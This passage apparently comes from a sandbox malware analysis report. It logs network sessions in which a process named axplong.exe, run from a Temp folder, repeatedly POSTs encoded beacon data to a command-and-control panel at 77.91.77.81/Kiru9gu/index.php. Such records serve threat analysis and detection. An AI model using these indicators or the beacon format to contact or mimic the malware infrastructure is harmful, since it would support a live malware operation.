Jul 2, 2024 00:26:24.659667969 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:25.225718021 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49814	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:25.592184067 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:26.179605007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49815	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:26.192961931 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:26.926578999 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49816	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:27.229995012 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:27.926383972 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49817	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:28.724673986 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:29.373922110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49818	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:29.483282089 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:30.191370010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49819	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:30.201194048 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:30.889023066 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49820	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:31.001980066 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:31.711632013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49821	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:32.704966068 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:33.405571938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49822	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:33.532319069 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:34.239108086 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49823	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:34.249169111 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:34.959758043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49824	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:35.079485893 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:35.796919107 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49825	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:35.814887047 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:36.541913986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49826	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:36.655046940 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:37.358474016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49827	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:37.368011951 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:38.077682972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49828	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:38.203366995 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:38.901175022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49829	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:38.926104069 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:39.626408100 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49830	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:40.295648098 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:41.007854939 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49831	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:41.018426895 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:41.732228994 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49832	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:41.843025923 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49833	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:41.859435081 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:42.566591978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49834	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:43.147583008 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:43.835758924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49835	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:43.886790991 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:44.560575962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49836	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:44.670752048 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
